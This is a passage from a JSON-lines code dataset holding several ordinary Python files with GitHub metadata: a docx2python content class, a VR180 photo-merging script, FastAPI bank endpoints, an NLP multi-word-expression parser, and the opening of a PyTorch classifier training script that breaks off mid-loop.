"line_number": 336, "usage_type": "attribute"}, 
{"api_name": "modules.args", "line_number": 336, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 339, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 339, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 351, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 351, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 362, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 362, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 365, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 365, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 372, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 372, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 376, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 376, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 386, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 386, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 391, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path", "line_number": 405, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 405, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 405, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 410, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 410, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 422, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 422, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 426, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 427, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 441, "usage_type": "call"}, {"api_name": "os.path", "line_number": 441, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 441, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 441, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 446, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 446, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 447, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 447, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 448, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 449, "usage_type": "call"}, {"api_name": "os.path", "line_number": 449, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 449, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 449, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 450, "usage_type": "call"}, {"api_name": "os.path", "line_number": 450, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 450, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 450, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 
455, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 455, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 456, "usage_type": "call"}, {"api_name": "os.path", "line_number": 456, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 456, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 456, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 458, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 461, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 462, "usage_type": "call"}, {"api_name": "os.path", "line_number": 462, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 462, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 462, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 463, "usage_type": "call"}, {"api_name": "os.path", "line_number": 463, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 463, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 463, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 468, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 468, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 469, "usage_type": "call"}, {"api_name": "os.path", "line_number": 469, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 469, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 469, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 470, "usage_type": "call"}, {"api_name": "os.path", "line_number": 470, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 471, "usage_type": "call"}, {"api_name": "modules.args.output_dir", "line_number": 474, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 474, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 475, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 475, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 477, "usage_type": "call"}, {"api_name": "os.path", "line_number": 477, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 477, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 477, "usage_type": "name"}, {"api_name": "modules.args", "line_number": 482, "usage_type": "name"}, {"api_name": "modules.args.parse_args", "line_number": 482, "usage_type": "call"}, {"api_name": "modules.args", "line_number": 483, "usage_type": "argument"}]} +{"seq_id": "31144676018", "text": "#!/usr/bin/env python3\n# _*_ coding: utf-8 _*_\n\"\"\"Output format for extracted docx content.\n\n:author: Shay Hill\n:created: 7/5/2019\n\nHolds runs in a 5-deep nested list (paragraphs are lists of text runs [strings])::\n\n [ # tables\n [ # table\n [ # row\n [ # cell\n [ # paragraph\n \"run 1 \", # text run\n \"run 2 \", # text run\n \"run 3\" # text run\n ]\n ]\n ]\n ]\n ]\n\n_runs properties (e.g., ``header_runs``) return text in this format.\n\nAlso returns a 4-deep nested list (paragraphs are strings)::\n\n [ # tables\n [ # table\n [ # row\n [ # cell\n \"run 1 run 2 run 3\" # paragraph\n ]\n ]\n ]\n ]\n\nThis is the format for default (no trailing 
\"_runs\", e.g ``header``) properties.\n\n\"\"\"\nfrom copy import deepcopy\nfrom dataclasses import dataclass\nfrom typing import Any, Dict, Optional\nfrom warnings import warn\n\nfrom .docx_context import collect_docProps\nfrom .docx_reader import DocxReader\nfrom .docx_text import TablesList\nfrom .iterators import enum_at_depth, get_html_map, iter_at_depth\n\n\n@dataclass\nclass DocxContent:\n \"\"\"Holds return values for docx content.\"\"\"\n\n docx_reader: DocxReader\n docx2python_kwargs: Dict[str, Any]\n\n def __getattr__(self, item) -> Any:\n \"\"\"\n Create depth-four paragraph tables form depth-five run tables.\n\n :param item:\n :return:\n\n Docx2Python v1 joined runs into paragraphs earlier in the code. Docx2Python v2\n exposes runs to the user, but still returns paragraphs by default.\n \"\"\"\n if item in {\"header\", \"footer\", \"body\", \"footnotes\", \"endnotes\"}:\n runs = deepcopy(getattr(self, item + \"_runs\"))\n for (i, j, k, l), paragraph in enum_at_depth(runs, 4):\n runs[i][j][k][l] = \"\".join(paragraph)\n return runs\n raise AttributeError(f\"no attribute {item}\")\n\n def _get_runs(self, type_: str) -> TablesList:\n content = []\n for file in self.docx_reader.files_of_type(type_):\n content += file.content\n return content\n\n @property\n def header_runs(self) -> TablesList:\n return self._get_runs(\"header\")\n\n @property\n def footer_runs(self) -> TablesList:\n return self._get_runs(\"footer\")\n\n @property\n def officeDocument_runs(self) -> TablesList:\n return self._get_runs(\"officeDocument\")\n\n @property\n def body_runs(self) -> TablesList:\n return self.officeDocument_runs\n\n @property\n def footnotes_runs(self) -> TablesList:\n return self._get_runs(\"footnotes\")\n\n @property\n def endnotes_runs(self) -> TablesList:\n return self._get_runs(\"endnotes\")\n\n @property\n def images(self) -> Dict[str, bytes]:\n return self.docx_reader.pull_image_files(\n self.docx2python_kwargs[\"image_folder\"]\n )\n\n @property\n def document(self) -> TablesList:\n \"\"\"All docx \"tables\" concatenated.\"\"\"\n return self.header + self.body + self.footer + self.footnotes + self.endnotes\n\n @property\n def document_runs(self) -> TablesList:\n \"\"\"All docx x_runs properties concatenated.\"\"\"\n return (\n self.header_runs\n + self.body_runs\n + self.footer_runs\n + self.footnotes_runs\n + self.endnotes_runs\n )\n\n @property\n def text(self) -> str:\n \"\"\"All docx paragraphs, \"\\n\\n\" delimited.\"\"\"\n if self.docx2python_kwargs[\"paragraph_styles\"] is True:\n # Paragraph descriptors have been inserted as the first run of each\n # paragraph. Take them out.\n pars = [\"\".join(x[1:]) for x in iter_at_depth(self.document_runs, 4)]\n return \"\\n\\n\".join(pars)\n return \"\\n\\n\".join(iter_at_depth(self.document, 4))\n\n @property\n def html_map(self) -> str:\n \"\"\"A visual mapping of docx content.\"\"\"\n return get_html_map(self.document)\n\n @property\n def properties(self) -> Dict[str, Optional[str]]:\n \"\"\"Document core-properties as a dictionary.\n\n Docx files created with Google docs won't have core-properties. If the file\n `core-properties` is missing, return an empty dict.\n \"\"\"\n warn(\n \"DocxContent.properties is deprecated and will be removed in some future \"\n \"version. 
Use DocxContent.core_properties.\",\n FutureWarning,\n )\n return self.core_properties\n\n # noinspection PyPep8Naming\n @property\n def core_properties(self) -> Dict[str, Optional[str]]:\n \"\"\"Document core-properties as a dictionary.\n\n Docx files created with Google docs won't have core-properties. If the file\n `core-properties` is missing, return an empty dict.\n \"\"\"\n try:\n docProps = next(iter(self.docx_reader.files_of_type(\"core-properties\")))\n return collect_docProps(docProps.root_element)\n except StopIteration:\n warn(\n \"Could not find core-properties file (should be in docProps/core.xml) \"\n \"in DOCX, so returning an empty core_properties dictionary. Docx files \"\n \"created in Google Docs do not have a core-properties file, so this \"\n \"may be expected.\"\n )\n return {}\n\n def save_images(self, image_folder: str) -> Dict[str, bytes]:\n return self.docx_reader.pull_image_files(image_folder)\n", "repo_name": "Saransh-13/Test_sum", "sub_path": "venv/Lib/site-packages/docx2python/docx_output.py", "file_name": "docx_output.py", "file_ext": "py", "file_size_in_byte": 5595, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "docx_reader.DocxReader", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 57, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 70, "usage_type": "call"}, {"api_name": "iterators.enum_at_depth", "line_number": 71, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 59, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 76, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 83, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 87, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 91, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 95, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 99, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 103, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 107, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 113, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 118, "usage_type": "name"}, {"api_name": "iterators.iter_at_depth", "line_number": 134, "usage_type": "call"}, {"api_name": "iterators.iter_at_depth", "line_number": 136, "usage_type": "call"}, {"api_name": "iterators.get_html_map", "line_number": 141, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 150, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 144, "usage_type": "name"}, {"api_name": "docx_context.collect_docProps", "line_number": 167, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 169, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 177, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "10528575245", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport shutil\nimport base64\nfrom libxmp import XMPFiles, XMPMeta\n\n# Usage\nif 
len(sys.argv) < 5:\n print('[Usage]')\n print(' $ python {0} [Left image path] [Right image path] [Image width] [Image height]'.format(sys.argv[0]))\n print(' * The image type must be jpeg.')\n print(' * These images must be same width and height.')\n print(' * Output merged vr image file named {Left image file}.vr.jpg.')\n exit()\n\n# Arguments\nlimage_path = sys.argv[1]\nrimage_path = sys.argv[2]\nimage_width = int(sys.argv[3])\nimage_height = int(sys.argv[4])\nif not os.path.isfile(limage_path):\n print('Left image path ({0}) is not exists.'.format(limage_path))\n exit()\nif not os.path.isfile(rimage_path):\n print('Right image path ({0}) is not exists.'.format(rimage_path))\n exit()\n\n# Copy left image file\nlimage_dir = os.path.split(limage_path)[0]\nlimage_fname = os.path.splitext(os.path.split(limage_path)[1])[0]\nvrimage_path = os.path.join(limage_dir, limage_fname + '.vr.jpg')\nshutil.copyfile(limage_path, vrimage_path)\n\n# Load image's xmp\nvrimage_file = XMPFiles(file_path=vrimage_path, open_forupdate=True)\nlxmp = vrimage_file.get_xmp()\n#print(lxmp)\n\n# Google's namespace\nXMP_GIMAGE = 'http://ns.google.com/photos/1.0/image/'\nXMP_GPANO = 'http://ns.google.com/photos/1.0/panorama/'\nXMPMeta.register_namespace(XMP_GIMAGE, 'GImage')\nXMPMeta.register_namespace(XMP_GPANO, 'GPano')\n\n# Set GPano properties\nlxmp.set_property(XMP_GPANO, 'ProjectionType', 'equirectangular')\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaLeftPixels', image_width/2)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaTopPixels', 0)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaImageWidthPixels', image_width)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaImageHeightPixels', image_height)\nlxmp.set_property_int(XMP_GPANO, 'FullPanoWidthPixels', image_width*2)\nlxmp.set_property_int(XMP_GPANO, 'FullPanoHeightPixels', image_height)\nlxmp.set_property_int(XMP_GPANO, 'InitialViewHeadingDegrees', 180)\n\n# Encode right image to BASE64\nrimage_data = open(rimage_path, 'rt').read()\nrimage_base64 = base64.b64encode(rimage_data)\n\n# Set GImage properties\nlxmp.set_property(XMP_GIMAGE, 'Mime', 'image/jpeg')\nlxmp.set_property(XMP_GIMAGE, 'Data', rimage_base64)\n\n# Put XMP.\nif vrimage_file.can_put_xmp(lxmp):\n vrimage_file.put_xmp(lxmp)\n print(vrimage_file.get_xmp())\n print(\"Done!\")\n\nvrimage_file.close_file()\n", "repo_name": "temoki/make_vr180photo_py", "sub_path": "make_vr180photo.py", "file_name": "make_vr180photo.py", "file_ext": "py", "file_size_in_byte": 2435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 31, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 33, "usage_type": "call"}, {"api_name": "libxmp.XMPFiles", "line_number": 36, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta.register_namespace", "line_number": 43, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta", "line_number": 43, "usage_type": "name"}, {"api_name": "libxmp.XMPMeta.register_namespace", "line_number": 44, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta", "line_number": 44, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "16776006048", "text": "from typing import List, Optional\n\nfrom fastapi import APIRouter, Depends, Query\nfrom fastapi.responses import JSONResponse\n\nfrom app.api.errors import BANK_NOT_FOUND\nfrom app.dependencies.services import get_bank_service\nfrom app.models.banks import Bank\nfrom app.models.currencies import Currency\nfrom app.services.banks import Banks\nfrom app.utils.exceptions import BankNotFound\nfrom loguru import logger\n\nrouter = APIRouter(tags=[\"banks\"], prefix=\"/banks\")\n\n\n@router.get(\n path=\"/all\",\n description=\"Метод получения списка всех банков\",\n response_model=List[Bank]\n)\nasync def get_banks(\n currency_id: Optional[int] = Query(default=None),\n banks_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_banks\")\n result = await banks_service.get_banks(currency_id)\n logger.info(\"Method get_banks return \" + result)\n logger.info(\"Finish method get_banks\")\n return result or JSONResponse({})\n\n\n@router.get(\n path=\"/{bank_id}\",\n description=\"Метод получения банка по id\",\n response_model=Bank\n)\nasync def get_bank_by_id(\n bank_id: int,\n bank_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_bank_by_id\")\n result = await bank_service.get_bank_by_id(bank_id)\n if result:\n logger.info(\"Method get_bank_by_id return \" + result)\n else:\n logger.error(f\"Method get_bank_by_id except {BANK_NOT_FOUND}\")\n return result or JSONResponse({\"error\": BANK_NOT_FOUND}, status_code=404)\n\n\n@router.get(\n path=\"/{bank_id}/currencies\",\n description=\"Метод дял получения валют банка\",\n response_model=List[Currency]\n)\nasync def get_bank_currencies(\n bank_id: int,\n bank_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_bank_currencies\")\n try:\n result = await bank_service.get_bank_currencies(bank_id)\n logger.info(\"Method get_bank_currencies return \" + result)\n return result\n except BankNotFound:\n logger.error(f\"Method get_bank_currencies except {BANK_NOT_FOUND}\")\n return JSONResponse({\"error\": BANK_NOT_FOUND}, status_code=404)\n", "repo_name": "Racers-Squad/Ficha-Backend", "sub_path": "app/api/routes/bank.py", "file_name": "bank.py", "file_ext": "py", "file_size_in_byte": 2221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.APIRouter", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 23, "usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 24, "usage_type": "name"}, {"api_name": "fastapi.Query", "line_number": 23, "usage_type": "call"}, {"api_name": 
"fastapi.Depends", "line_number": 24, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 24, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 26, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 26, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 28, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 28, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 29, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 29, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "app.models.banks.Bank", "line_number": 20, "usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 40, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 40, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 40, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 42, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 42, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 45, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 45, "usage_type": "name"}, {"api_name": "loguru.logger.error", "line_number": 47, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 47, "usage_type": "name"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 47, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 48, "usage_type": "call"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 48, "usage_type": "name"}, {"api_name": "app.models.banks.Bank", "line_number": 36, "usage_type": "name"}, {"api_name": "app.services.banks.Banks", "line_number": 58, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 58, "usage_type": "call"}, {"api_name": "app.dependencies.services.get_bank_service", "line_number": 58, "usage_type": "argument"}, {"api_name": "loguru.logger.info", "line_number": 60, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 60, "usage_type": "name"}, {"api_name": "loguru.logger.info", "line_number": 63, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 63, "usage_type": "name"}, {"api_name": "app.utils.exceptions.BankNotFound", "line_number": 65, "usage_type": "name"}, {"api_name": "loguru.logger.error", "line_number": 66, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 66, "usage_type": "name"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 66, "usage_type": "name"}, {"api_name": "fastapi.responses.JSONResponse", "line_number": 67, "usage_type": "call"}, {"api_name": "app.api.errors.BANK_NOT_FOUND", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 54, "usage_type": "name"}, {"api_name": "app.models.currencies.Currency", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "72561785767", "text": "import itertools\nimport threading\nfrom abc import ABC, abstractmethod\nfrom functools import lru_cache\nfrom typing import List, Tuple, Dict, Optional\nfrom fnmatch import fnmatch\n\nimport tokenizations\n\nfrom i18n import Language\nfrom models import Mwe\n\n\nclass Parsed:\n def __init__(self, language: Language, text: str, tokens: List[str],\n token_positions: List[Tuple[int, 
int]],\n lemmas: List[str]):\n self.language = language\n self.text = text\n self.tokens = tokens\n self.token_positions = token_positions\n self.lemmas = lemmas\n\n def contains_mwe(self, mwe: Mwe) -> bool:\n return self.contains_mwe_with_lemmas(mwe.lemmas)\n\n def contains_mwe_with_lemmas(self, lemmas: List[str]) -> bool:\n all_lemmas_exist = True\n\n for lemma in lemmas:\n this_lemma_exists = False\n for possible_lemma in lemma.split(\"|\"):\n if \"*\" in possible_lemma or \"?\" in possible_lemma:\n if any([fnmatch(parsed_lemma, possible_lemma) for parsed_lemma in self.lemmas]):\n this_lemma_exists = True\n elif any([fnmatch(parsed_token, possible_lemma) for parsed_token in self.tokens]):\n this_lemma_exists = True\n else:\n if any([parsed_lemma == possible_lemma for parsed_lemma in self.lemmas]):\n this_lemma_exists = True\n all_lemmas_exist = all_lemmas_exist and this_lemma_exists\n\n return all_lemmas_exist\n\n def get_mwe_indices(self, mwe: Mwe) -> Tuple:\n if not self.contains_mwe(mwe):\n raise AssertionError(\"Mwe should be in parsed sentence.\")\n\n mwe_lemma_positions: Dict[str, List[int]] = dict()\n for ix_tm, mwe_lemma in enumerate(mwe.lemmas):\n mwe_lemma_positions[mwe_lemma] = []\n for possible_lemma in mwe_lemma.split(\"|\"):\n if \"*\" in possible_lemma or \"?\" in possible_lemma:\n for ix, lemma in enumerate(self.lemmas):\n if fnmatch(lemma, possible_lemma):\n mwe_lemma_positions[mwe_lemma].append(ix)\n for ix, token in enumerate(self.tokens):\n if fnmatch(token, possible_lemma):\n mwe_lemma_positions[mwe_lemma].append(ix)\n else:\n for ix, lemma in enumerate(self.lemmas):\n if lemma == possible_lemma:\n mwe_lemma_positions[mwe_lemma].append(ix)\n\n mwe_instances = list(itertools.product(*[x for x in mwe_lemma_positions.values()]))\n mwe_instances_sorted = sorted(mwe_instances, key=lambda x: max(x) - min(x))\n return mwe_instances_sorted[0]\n\n def get_mwe_tokens(self, mwe: Mwe) -> List[str]:\n mwe_indices = self.get_mwe_indices(mwe)\n return [self.tokens[x] for x in mwe_indices]\n\n\nclass Parser(ABC):\n def __init__(self):\n self.parser_lock = threading.Lock()\n self.language = None\n\n @abstractmethod\n def get_sentence_count(self, text: str):\n pass\n\n @abstractmethod\n def lemmatize(self, text: str, mwe: Optional[Mwe] = None) -> Tuple[List[str], List[str]]:\n pass\n\n @lru_cache(maxsize=None)\n def parse(self, text: str, mwe: Mwe = None) -> Parsed:\n with self.parser_lock:\n tokens, lemmas = self.lemmatize(text, mwe)\n # print(\"Language:\", self.language)\n # print(\"Tokens:\", tokens)\n # print(\"Lemmas:\", lemmas)\n token_positions = tokenizations.get_original_spans(tokens, text)\n return Parsed(self.language, text, tokens, token_positions, lemmas)\n", "repo_name": "Dodiom/dodiom", "sub_path": "src/nlp/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 3741, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "i18n.Language", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "fnmatch.fnmatch", "line_number": 34, "usage_type": "call"}, 
{"api_name": "fnmatch.fnmatch", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Mwe", "line_number": 45, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "fnmatch.fnmatch", "line_number": 55, "usage_type": "call"}, {"api_name": "fnmatch.fnmatch", "line_number": 58, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 65, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 45, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 69, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 69, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 74, "usage_type": "name"}, {"api_name": "threading.Lock", "line_number": 76, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 84, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 84, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 83, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 84, "usage_type": "name"}, {"api_name": "models.Mwe", "line_number": 88, "usage_type": "name"}, {"api_name": "tokenizations.get_original_spans", "line_number": 94, "usage_type": "call"}, {"api_name": "functools.lru_cache", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "40301737406", "text": "#!/usr/bin/env python3\n\"\"\"Train a classifier to classify images as backgroud or targets.\"\"\"\n\nimport argparse\nimport datetime\nimport pathlib\nfrom typing import Tuple\nimport tarfile\nimport shutil\nimport yaml\n\nimport torch\n\nfrom train import datasets\nfrom train.train_utils import utils, swa\nfrom core import classifier\nfrom data_generation import generate_config\n\n_LOG_INTERVAL = 50\n_SAVE_DIR = pathlib.Path(\"~/runs/uav-clf\").expanduser()\n\n\ndef train(model_cfg: dict, train_cfg: dict, save_dir: pathlib.Path = None) -> None:\n\n # TODO(alex) these paths should be in the generate config\n train_loader = create_data_loader(train_cfg, generate_config.DATA_DIR / \"clf_train\")\n eval_loader = create_data_loader(train_cfg, generate_config.DATA_DIR / \"clf_val\")\n\n use_cuda = torch.cuda.is_available()\n\n highest_score = {\"base\": 0, \"swa\": 0}\n\n clf_model = classifier.Classifier(\n backbone=model_cfg.get(\"backbone\", None),\n img_width=generate_config.PRECLF_SIZE[0],\n img_height=generate_config.PRECLF_SIZE[0],\n num_classes=2,\n )\n print(\"Model: \\n\", clf_model)\n\n if use_cuda:\n torch.backends.cudnn.benchmark = True\n clf_model.cuda()\n\n optimizer = create_optimizer(train_cfg[\"optimizer\"], clf_model)\n lr_params = train_cfg[\"lr_scheduler\"]\n\n epochs = train_cfg.get(\"epochs\", 0)\n assert epochs > 0, \"Please supply epoch > 0\"\n\n lr_scheduler = torch.optim.lr_scheduler.OneCycleLR(\n optimizer,\n float(lr_params.get(\"max_lr\", 1e-2)),\n total_steps=len(train_loader) * epochs,\n pct_start=float(lr_params.get(\"warmup_fraction\", 0.1)),\n div_factor=float(lr_params[\"max_lr\"]) / float(lr_params[\"start_lr\"]),\n final_div_factor=float(lr_params[\"start_lr\"]) / float(lr_params[\"end_lr\"]),\n )\n\n loss_fn = torch.nn.CrossEntropyLoss()\n global_step = 0\n\n for epoch in range(epochs):\n all_losses = []\n\n for idx, (data, labels) in enumerate(train_loader):\n optimizer.zero_grad()\n global_step += 1\n\n if 
